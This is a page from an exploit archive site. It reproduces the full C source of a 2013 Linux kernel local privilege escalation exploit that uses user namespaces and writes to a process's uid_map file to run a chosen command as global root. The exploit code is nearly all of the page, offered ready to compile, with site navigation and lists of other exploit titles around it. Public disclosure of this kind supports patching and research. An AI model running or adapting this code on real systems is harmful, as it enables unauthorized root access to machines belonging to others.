首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel open-time Capability file_ns_capable() - Privilege Escalation Vulne
来源:vfocus.net 作者:Lutomirski 发布时间:2013-05-09  

/* userns_root_sploit.c by */
/* Copyright (c) 2013 Andrew Lutomirski.  All rights reserved. */
/* You may use, modify, and redistribute this code under the GPLv2. */

#define _GNU_SOURCE
#include <unistd.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <err.h>
#include <linux/futex.h>
#include <errno.h>
#include <unistd.h>
#include <sys/syscall.h>

#ifndef CLONE_NEWUSER
#define CLONE_NEWUSER 0x10000000
#endif

pid_t parent;
int *ftx;

int childfn()
{
  int fd;
  char buf[128];

  if (syscall(SYS_futex, ftx, FUTEX_WAIT, 0, 0, 0, 0) == -1 &&
      errno != EWOULDBLOCK)
    err(1, "futex");

  sprintf(buf, "/proc/%ld/uid_map", (long)parent);
  fd = open(buf, O_RDWR | O_CLOEXEC);
  if (fd == -1)
    err(1, "open %s", buf);
  if (dup2(fd, 1) != 1)
    err(1, "dup2");

  // Write something like "0 0 1" to stdout with elevated capabilities.
  execl("./zerozeroone", "./zerozeroone");

  return 0;
}

int main(int argc, char **argv)
{
  int dummy, status;
  pid_t child;

  if (argc < 2) {
    printf("usage: userns_root_sploit COMMAND ARGS...\n\n"
           "This will run a command as (global) uid 0 but no capabilities.\n");
    return 1;
  }

  ftx = mmap(0, sizeof(int), PROT_READ | PROT_WRITE,
             MAP_SHARED | MAP_ANONYMOUS, -1, 0);
  if (ftx == MAP_FAILED)
    err(1, "mmap");

  parent = getpid();

  if (signal(SIGCHLD, SIG_DFL) != 0)
    err(1, "signal");

  child = fork();
  if (child == -1)
    err(1, "fork");
  if (child == 0)
    return childfn();

  *ftx = 1;
  if (syscall(SYS_futex, ftx, FUTEX_WAKE, 1, 0, 0, 0) != 0)
    err(1, "futex");

  if (unshare(CLONE_NEWUSER) != 0)
    err(1, "unshare(CLONE_NEWUSER)");

  if (wait(&status) != child)
    err(1, "wait");
  if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
    errx(1, "child failed");

  if (setresuid(0, 0, 0) != 0)
    err(1, "setresuid");
  execvp(argv[1], argv+1);
  err(1, argv[1]);

  return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Flightgear 2.0, 2.4 - Remote F
·ERS Viewer 2011 ERS File Handl
·ColdFusion 9 / 10 Remote Root
·Lan Messenger sending PM Buffe
·MoinMelt Arbitrary Command Exe
·SAP SOAP RFC SXPG_COMMAND_EXEC
·Dovecot with Exim sender_addre
·SAP SOAP RFC SXPG_CALL_SYSTEM
·Microsoft Internet Explorer CG
·No-IP Dynamic Update Client (D
·Huawei SNMPv3 Buffer Overflow
·Kloxo 6.1.6 - Local Privilege
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved